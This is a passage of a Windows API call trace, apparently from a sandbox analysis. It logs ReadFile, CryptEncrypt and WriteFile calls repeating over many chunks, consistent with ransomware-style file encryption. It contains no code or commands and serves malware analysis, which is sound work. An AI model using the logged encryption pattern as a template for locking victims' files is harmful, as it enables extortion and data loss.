lpOverlapped=0x0) returned 1 [0261.347] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.347] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.347] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.347] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.347] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.347] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.347] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.347] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.347] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.348] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.348] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.348] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.348] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.348] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.348] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.348] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.348] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.348] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.348] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.348] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.348] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.348] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.348] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.348] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.348] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.348] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.348] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.349] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.349] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.349] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.349] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.349] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.349] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.349] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.349] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.349] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.349] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.349] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.349] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.349] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.349] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.349] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.349] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.349] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.350] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.350] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.350] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.350] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.350] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.350] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.350] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.350] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.350] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.350] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.350] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.350] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.350] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.350] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.350] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.350] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.350] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.350] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.351] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.351] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.351] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.351] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.351] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.351] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.351] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.351] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.351] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.351] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.351] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.351] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.351] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.351] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.351] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.351] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.351] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.352] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.352] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.352] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.352] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.352] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.352] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.352] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.352] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.352] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.352] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.352] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.352] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.352] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.352] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.352] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.352] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.352] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.352] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.353] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.353] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.353] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.353] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.353] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.353] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.353] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 